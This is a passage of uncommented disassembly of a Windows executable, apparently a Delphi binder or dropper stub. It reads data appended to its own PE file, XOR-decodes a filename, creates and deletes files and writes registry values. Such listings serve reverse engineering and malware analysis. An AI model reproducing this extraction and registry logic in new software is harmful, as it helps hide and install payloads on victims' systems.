; =============== S U B R O U T I N E =======================================
sub_402914 proc near ; DATA XREF: CODE:00403F74�o
sub ds:dword_4063BC, 1
jnb short locret_402940
call sub_40100C ; GetProcessHeap
mov ds:dword_4063C0, eax
mov ds:off_406000, offset sub_4025B8
call sub_402580
call sub_4010EC ; GetCurrentThreadId
mov ds:dword_406018, eax
locret_402940: ; CODE XREF: sub_402914+7�j
retn
sub_402914 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402944 proc near ; CODE XREF: sub_402958+21�p
push eax
push 40h
call sub_401044 ; LocalAlloc
retn
sub_402944 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402950 proc near ; CODE XREF: sub_402958+1�p
mov eax, 4
retn
sub_402950 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402958 proc near ; CODE XREF: sub_40299C:loc_4029B6�p
push ebx
call sub_402950
mov ebx, eax
test ebx, ebx
jz short loc_40299A
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_402977
mov eax, 0E2h
call sub_401DB8
; ---------------------------------------------------------------------------
loc_402977: ; CODE XREF: sub_402958+13�j
mov eax, ebx
call sub_402944
test eax, eax
jnz short loc_40298E
mov eax, 0E2h
call sub_401DB8
; ---------------------------------------------------------------------------
jmp short loc_40299A
; ---------------------------------------------------------------------------
loc_40298E: ; CODE XREF: sub_402958+28�j
push eax
mov eax, ds:TlsIndex
push eax
call sub_401054 ; TlsSetValue
loc_40299A: ; CODE XREF: sub_402958+A�j
; sub_402958+34�j
pop ebx
retn
sub_402958 endp
; =============== S U B R O U T I N E =======================================
sub_40299C proc near ; CODE XREF: sub_4011D0+20�p
; sub_401228+3�p ...
mov cl, ds:byte_4064A0
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_4029D1
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_4029B6: ; CODE XREF: sub_40299C+3D�j
call sub_402958
mov eax, ds:TlsIndex
push eax
call sub_40104C ; TlsGetValue
test eax, eax
jz short loc_4029CB
retn
; ---------------------------------------------------------------------------
loc_4029CB: ; CODE XREF: sub_40299C+2C�j
mov eax, ds:dword_4064B4
retn
; ---------------------------------------------------------------------------
loc_4029D1: ; CODE XREF: sub_40299C+D�j
push eax
call sub_40104C ; TlsGetValue
test eax, eax
jz short loc_4029B6
retn
sub_40299C endp
; =============== S U B R O U T I N E =======================================
sub_4029DC proc near ; CODE XREF: sub_4029E8+2E�p
mov eax, offset dword_40508C
call sub_402858
retn
sub_4029DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4029E8 proc near ; CODE XREF: CODE:00403FE3�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_40103C ; GetModuleHandleA
mov ds:dword_4064AC, eax
mov eax, ds:dword_4064AC
mov ds:dword_405090, eax
xor eax, eax
mov ds:dword_405094, eax
xor eax, eax
mov ds:dword_405098, eax
call sub_4029DC
mov edx, offset dword_40508C
mov eax, ebx
call sub_401C70
pop ebx
retn
sub_4029E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2C proc near ; DATA XREF: CODE:00403F70�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402A51
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402A58
loc_402A50: ; CODE XREF: sub_402A2C+2A�j
retn
; ---------------------------------------------------------------------------
loc_402A51: ; DATA XREF: sub_402A2C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402A50
; ---------------------------------------------------------------------------
loc_402A58: ; CODE XREF: sub_402A2C:loc_402A50�j
; DATA XREF: sub_402A2C+1F�o
pop ebp
retn
sub_402A2C endp
; ---------------------------------------------------------------------------
align 4
loc_402A5C: ; DATA XREF: CODE:off_403F6C�o
sub ds:dword_4064B0, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A64 proc near ; DATA XREF: CODE:00403F80�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402A89
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064B8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402A90
loc_402A88: ; CODE XREF: sub_402A64+2A�j
retn
; ---------------------------------------------------------------------------
loc_402A89: ; DATA XREF: sub_402A64+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402A88
; ---------------------------------------------------------------------------
loc_402A90: ; CODE XREF: sub_402A64:loc_402A88�j
; DATA XREF: sub_402A64+1F�o
pop ebp
retn
sub_402A64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A94 proc near ; DATA XREF: CODE:00403F7C�o
sub ds:dword_4064B8, 1
retn
sub_402A94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A9C proc near ; CODE XREF: sub_402C0C+76�p
jmp ds:dword_407128
sub_402A9C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AA4 proc near ; CODE XREF: sub_402C0C+43�p
jmp ds:dword_407124
sub_402AA4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AAC proc near ; CODE XREF: sub_402C0C+6D�p
jmp ds:dword_407120
sub_402AAC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AB4 proc near ; CODE XREF: sub_402E38+12F�p
; sub_402E38+137�p ...
jmp ds:dword_407194
sub_402AB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402ABC proc near ; CODE XREF: CODE:00404731�p
jmp ds:dword_407190
sub_402ABC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AC4 proc near ; CODE XREF: sub_402E38+45�p
; sub_403038+5E�p
jmp ds:dword_40718C
sub_402AC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402ACC proc near ; CODE XREF: sub_403640+8B�p
jmp ds:dword_407188
sub_402ACC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AD4 proc near ; CODE XREF: sub_403038+79�p
jmp ds:dword_407184
sub_402AD4 endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_407180
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE4 proc near ; CODE XREF: sub_403368+D�p
jmp ds:dword_40717C
sub_402AE4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AEC proc near ; CODE XREF: sub_403368+3D�p
jmp ds:dword_407178
sub_402AEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AF4 proc near ; CODE XREF: sub_4033B0+55�p
jmp ds:dword_407174
sub_402AF4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AFC proc near ; CODE XREF: sub_402CB8+B�p
jmp ds:dword_407170
sub_402AFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B04 proc near ; CODE XREF: sub_402E38+E7�p
jmp ds:dword_40716C
sub_402B04 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B0C proc near ; CODE XREF: sub_40348C+19�p
; sub_40350C+19�p ...
jmp ds:dword_407168
sub_402B0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B14 proc near ; CODE XREF: sub_40348C+1F�p
; sub_40350C+1F�p ...
jmp ds:dword_407164
sub_402B14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B1C proc near ; CODE XREF: sub_403640+BF�p
jmp ds:dword_407160
sub_402B1C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B24 proc near ; CODE XREF: sub_403368+29�p
jmp ds:dword_40715C
sub_402B24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B2C proc near ; CODE XREF: sub_403368+31�p
jmp ds:dword_407158
sub_402B2C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B34 proc near ; CODE XREF: sub_402E38+65�p
; sub_402E38+95�p ...
jmp ds:dword_407154
sub_402B34 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B3C proc near ; CODE XREF: sub_403640+E4�p
jmp ds:dword_407150
sub_402B3C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B44 proc near ; CODE XREF: sub_403640+247�p
jmp ds:dword_40714C
sub_402B44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B4C proc near ; CODE XREF: sub_402E38+53�p
; sub_402E38+7D�p ...
jmp ds:dword_407148
sub_402B4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B54 proc near ; CODE XREF: sub_40348C+34�p
; sub_40350C+34�p
jmp ds:dword_407144
sub_402B54 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B5C proc near ; CODE XREF: sub_403640+215�p
jmp ds:dword_407140
sub_402B5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B64 proc near ; CODE XREF: sub_403368+1B�p
jmp ds:dword_40713C
sub_402B64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B6C proc near ; CODE XREF: CODE:004043AE�p
; CODE:004043F1�p
jmp ds:dword_407138
sub_402B6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B74 proc near ; CODE XREF: sub_403640+23C�p
jmp ds:dword_407134
sub_402B74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B7C proc near ; CODE XREF: sub_403640+15E�p
; sub_403640+1A7�p ...
jmp ds:dword_407130
sub_402B7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B84 proc near ; CODE XREF: sub_403168+6C�p
; CODE:00404047�p
xor ecx, ecx
call sub_4018A8
retn
sub_402B84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B8C proc near ; DATA XREF: CODE:00403F88�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402BB1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064BC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402BB8
loc_402BB0: ; CODE XREF: sub_402B8C+2A�j
retn
; ---------------------------------------------------------------------------
loc_402BB1: ; DATA XREF: sub_402B8C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402BB0
; ---------------------------------------------------------------------------
loc_402BB8: ; CODE XREF: sub_402B8C:loc_402BB0�j
; DATA XREF: sub_402B8C+1F�o
pop ebp
retn
sub_402B8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402BBC proc near ; DATA XREF: CODE:00403F84�o
sub ds:dword_4064BC, 1
retn
sub_402BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402BC4 proc near ; CODE XREF: sub_403038+73�p
jmp ds:dword_4071A0
sub_402BC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402BCC proc near ; CODE XREF: CODE:0040433E�p
; CODE:0040455B�p
jmp ds:dword_40719C
sub_402BCC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BD4 proc near ; DATA XREF: CODE:00403F90�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402BF9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402C00
loc_402BF8: ; CODE XREF: sub_402BD4+2A�j
retn
; ---------------------------------------------------------------------------
loc_402BF9: ; DATA XREF: sub_402BD4+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402BF8
; ---------------------------------------------------------------------------
loc_402C00: ; CODE XREF: sub_402BD4:loc_402BF8�j
; DATA XREF: sub_402BD4+1F�o
pop ebp
retn
sub_402BD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402C04 proc near ; DATA XREF: CODE:00403F8C�o
sub ds:dword_4064C0, 1
retn
sub_402C04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C0C proc near ; CODE XREF: CODE:0040477B�p
; CODE:00404799�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00401B94 SIZE 00000036 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
call sub_402048
mov eax, [ebp+var_8]
call sub_402048
mov eax, [ebp+arg_0]
call sub_402048
xor eax, eax
push ebp
push offset loc_402CAA
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+var_4]
call sub_402058
push eax
push ebx
call sub_402AA4 ; RegOpenKeyA
mov eax, [ebp+arg_0]
call sub_401F04
mov ebx, eax
push ebx
lea eax, [ebp+arg_0]
call sub_4020AC
push eax
push 1
push 0
mov eax, [ebp+var_8]
call sub_402058
push eax
mov eax, [ebp+var_C]
push eax
call sub_402AAC ; RegSetValueExA
mov eax, [ebp+var_C]
push eax
call sub_402A9C ; RegCloseKey
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402CB1
loc_402C94: ; CODE XREF: sub_402C0C+A3�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
lea eax, [ebp+arg_0]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_402CAA: ; DATA XREF: sub_402C0C+2A�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402C94
; ---------------------------------------------------------------------------
loc_402CB1: ; CODE XREF: sub_402C0C+9D�j
; DATA XREF: sub_402C0C+83�o
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_402C0C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402CB8 proc near ; CODE XREF: CODE:0040445E�p
; CODE:004046BC�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_402058
push eax
call sub_402AFC ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_402CD1
test al, 10h
jnz short loc_402CD5
loc_402CD1: ; CODE XREF: sub_402CB8+13�j
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402CD5: ; CODE XREF: sub_402CB8+17�j
mov al, 1
pop ebx
retn
sub_402CB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CDC proc near ; CODE XREF: CODE:004042B2�p
var_15C = byte ptr -15Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEA4h
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_402E29
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_401DC4
mov eax, ds:off_4050C4
mov byte ptr [eax], 0
mov edx, [ebp+var_4]
lea eax, [ebp+var_15C]
call sub_4016A4
mov edx, 1
lea eax, [ebp+var_15C]
call sub_4019EC
call sub_401228
lea eax, [ebp+var_15C]
call sub_40185C
call sub_401228
mov [ebp+var_C], eax
cmp [ebp+var_C], 400h
jle short loc_402DCA
loc_402D56: ; CODE XREF: sub_402CDC+EC�j
lea eax, [ebp+var_8]
mov edx, 400h
call sub_402184
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
call sub_4020AC
mov edx, eax
mov ecx, 400h
lea eax, [ebp+var_15C]
call sub_4017A8
call sub_401228
mov eax, esi
mov edx, [ebp+var_8]
call sub_401F0C
mov eax, [ebp+var_10]
sub [ebp+var_C], eax
lea eax, [ebp+var_15C]
call sub_40185C
call sub_401228
mov ecx, 64h
cdq
idiv ecx
mov edi, eax
xor ebx, ebx
jmp short loc_402DB6
; ---------------------------------------------------------------------------
loc_402DB4: ; CODE XREF: sub_402CDC+E3�j
add ebx, edi
loc_402DB6: ; CODE XREF: sub_402CDC+D6�j
mov eax, [esi]
call sub_401F04
cmp ebx, eax
jl short loc_402DB4
cmp [ebp+var_C], 400h
jg short loc_402D56
loc_402DCA: ; CODE XREF: sub_402CDC+78�j
lea eax, [ebp+var_8]
mov edx, [ebp+var_C]
call sub_402184
push 0
lea eax, [ebp+var_8]
call sub_4020AC
mov edx, eax
mov ecx, [ebp+var_C]
lea eax, [ebp+var_15C]
call sub_4017A8
call sub_401228
mov eax, esi
mov edx, [ebp+var_8]
call sub_401F0C
lea eax, [ebp+var_15C]
call sub_4017E8
call sub_401228
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402E30
loc_402E1B: ; CODE XREF: sub_402CDC+152�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_402E29: ; DATA XREF: sub_402CDC+21�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402E1B
; ---------------------------------------------------------------------------
loc_402E30: ; CODE XREF: sub_402CDC+14C�j
; DATA XREF: sub_402CDC+13A�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402CDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E38 proc near ; CODE XREF: CODE:004040A8�p
; CODE:004041DD�p ...
var_174 = byte ptr -174h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_14C = byte ptr -14Ch
var_146 = word ptr -146h
var_54 = byte ptr -54h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFE8Ch
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_402FA2
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
call sub_402058
push eax
call sub_402AC4 ; CreateFileA
mov esi, eax
push 0
push 0
push 0
push esi
call sub_402B4C ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 40h
lea eax, [ebp+var_54]
push eax
push esi
call sub_402B34 ; ReadFile
cmp [ebp+var_10], 40h
jnz loc_402F86
push 0
push 0
mov eax, [ebp+var_18]
push eax
push esi
call sub_402B4C ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 0F8h
lea eax, [ebp+var_14C]
push eax
push esi
call sub_402B34 ; ReadFile
cmp [ebp+var_10], 0F8h
jnz loc_402F7E
push 1
push 0
movzx eax, [ebp+var_146]
dec eax
shl eax, 3
lea eax, [eax+eax*4]
push eax
push esi
call sub_402B4C ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 28h
lea eax, [ebp+var_174]
push eax
push esi
call sub_402B34 ; ReadFile
mov eax, [ebp+var_160]
add eax, [ebp+var_164]
mov [ebp+var_14], eax
push 0
push esi
call sub_402B04 ; GetFileSize
mov edi, eax
sub edi, [ebp+var_14]
test edi, edi
jbe short loc_402F76
push 0
push 0
mov eax, [ebp+var_14]
push eax
push esi
call sub_402B4C ; SetFilePointer
mov eax, edi
call sub_401144
mov edx, [ebp+var_8]
mov [edx], eax
push 0
lea eax, [ebp+var_10]
push eax
push edi
mov eax, [ebp+var_8]
mov eax, [eax]
push eax
push esi
call sub_402B34 ; ReadFile
cmp edi, [ebp+var_10]
jnz short loc_402F6E
mov bl, 1
mov eax, [ebp+var_C]
mov [eax], edi
push esi
call sub_402AB4 ; CloseHandle
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F6E: ; CODE XREF: sub_402E38+125�j
push esi
call sub_402AB4 ; CloseHandle
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F76: ; CODE XREF: sub_402E38+F3�j
push esi
call sub_402AB4 ; CloseHandle
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F7E: ; CODE XREF: sub_402E38+A1�j
push esi
call sub_402AB4 ; CloseHandle
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F86: ; CODE XREF: sub_402E38+6E�j
push esi
call sub_402AB4 ; CloseHandle
loc_402F8C: ; CODE XREF: sub_402E38+134�j
; sub_402E38+13C�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402FA9
loc_402F99: ; CODE XREF: sub_402E38+16F�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_402FA2: ; DATA XREF: sub_402E38+20�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402F99
; ---------------------------------------------------------------------------
loc_402FA9: ; CODE XREF: sub_402E38+169�j
; DATA XREF: sub_402E38+15C�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FB4 proc near ; CODE XREF: sub_403038+2D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov edi, eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403029
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov esi, eax
test esi, esi
jle short loc_403008
mov ebx, 1
loc_402FEE: ; CODE XREF: sub_402FB4+52�j
lea eax, [ebp+var_4]
call sub_4020AC
mov edx, [ebp+var_4]
movzx edx, byte ptr [edx+ebx-1]
xor edx, edi
mov [eax+ebx-1], dl
inc ebx
dec esi
jnz short loc_402FEE
loc_403008: ; CODE XREF: sub_402FB4+33�j
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
call sub_401E18
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403030
loc_403020: ; CODE XREF: sub_402FB4+7A�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403029: ; DATA XREF: sub_402FB4+1C�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403020
; ---------------------------------------------------------------------------
loc_403030: ; CODE XREF: sub_402FB4+74�j
; DATA XREF: sub_402FB4+67�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_402FB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403038 proc near ; CODE XREF: CODE:004043D7�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
xor edx, edx
mov [ebp+var_4], edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4030DE
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_4]
mov edx, offset aA7qmt ; "a7qmt"
mov eax, 19h
call sub_402FB4
lea eax, [ebp+var_104]
xor ecx, ecx
mov edx, 100h
call sub_4018A8
push 0
push 2
push 2
push 0
push 2
push 40000000h
mov eax, [ebp+var_4]
call sub_402058
mov ebx, eax
push ebx
call sub_402AC4 ; CreateFileA
push eax
call sub_402AB4 ; CloseHandle
lea eax, [ebp+var_104]
push eax
push 0
push ebx
call sub_402BC4 ; FindExecutableA
push ebx
call sub_402AD4 ; DeleteFileA
mov eax, esi
lea edx, [ebp+var_104]
mov ecx, 100h
call sub_401EEC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4030E5
loc_4030D5: ; CODE XREF: sub_403038+AB�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_4030DE: ; DATA XREF: sub_403038+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4030D5
; ---------------------------------------------------------------------------
loc_4030E5: ; CODE XREF: sub_403038+A5�j
; DATA XREF: sub_403038+98�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403038 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 5
aA7qmt db 'a7qmt',0 ; DATA XREF: sub_403038+23�o
align 4
; =============== S U B R O U T I N E =======================================
sub_4030FC proc near ; CODE XREF: CODE:00404211�p
; CODE:00404226�p ...
var_108 = byte ptr -108h
push ebx
push esi
add esp, 0FFFFFEF4h
mov esi, edx
mov ebx, eax
lea edx, [esp+114h+var_108]
mov eax, ebx
call sub_401A74
lea edx, [esp+114h+var_108]
mov eax, esp
mov cl, 0Bh
call sub_401840
mov eax, esi
mov edx, esp
call sub_401EE0
add esp, 10Ch
pop esi
pop ebx
retn
sub_4030FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403134 proc near ; CODE XREF: sub_403168+B2�p
; sub_403168+F9�p
push ecx
mov edx, esp
call sub_401A80
pop edx
retn
sub_403134 endp
; ---------------------------------------------------------------------------
align 10h
off_403140 dd offset dword_403144 ; DATA XREF: sub_403168+7B�r
; sub_403168+12C�r ...
dword_403144 dd 322E0211h, 4 dd offset off_401000
dd 48h
dd offset off_401000
dd 746E750Ch, 636E5F46h, 6E6F6974h, 408D73h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403168 proc near ; CODE XREF: CODE:004040F2�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403334
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_10]
mov edx, [ebp+var_4]
call sub_401E5C
loc_40319D: ; CODE XREF: sub_403168+60�j
mov edx, [ebp+var_10]
mov eax, offset dword_40334C
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
mov edx, [ebp+var_10]
mov eax, offset dword_40334C
call sub_40213C
test eax, eax
jg short loc_40319D
xor edi, edi
lea eax, [ebp+var_C]
mov edx, 4
call sub_402B84
push 1
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, off_403140
call sub_4027E8
add esp, 4
jmp loc_4032C7
; ---------------------------------------------------------------------------
loc_4031F6: ; CODE XREF: sub_403168+16E�j
lea eax, [ebp+var_14]
push eax
mov edx, [ebp+var_10]
mov eax, offset dword_403358
call sub_40213C
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_10]
call sub_4020B4
mov eax, [ebp+var_14]
call sub_403134
mov ebx, eax
mov edx, [ebp+var_10]
mov eax, offset dword_403358
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
lea eax, [ebp+var_18]
push eax
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_10]
call sub_4020B4
mov eax, [ebp+var_18]
call sub_403134
mov esi, eax
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
cmp edi, ebx
jg short loc_4032A2
lea edi, [ebx+1]
push edi
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, off_403140
call sub_4027E8
add esp, 4
loc_4032A2: ; CODE XREF: sub_403168+11E�j
mov eax, [ebp+var_C]
lea eax, [eax+ebx*4]
push eax
mov ecx, esi
mov edx, 1
mov eax, [ebp+var_4]
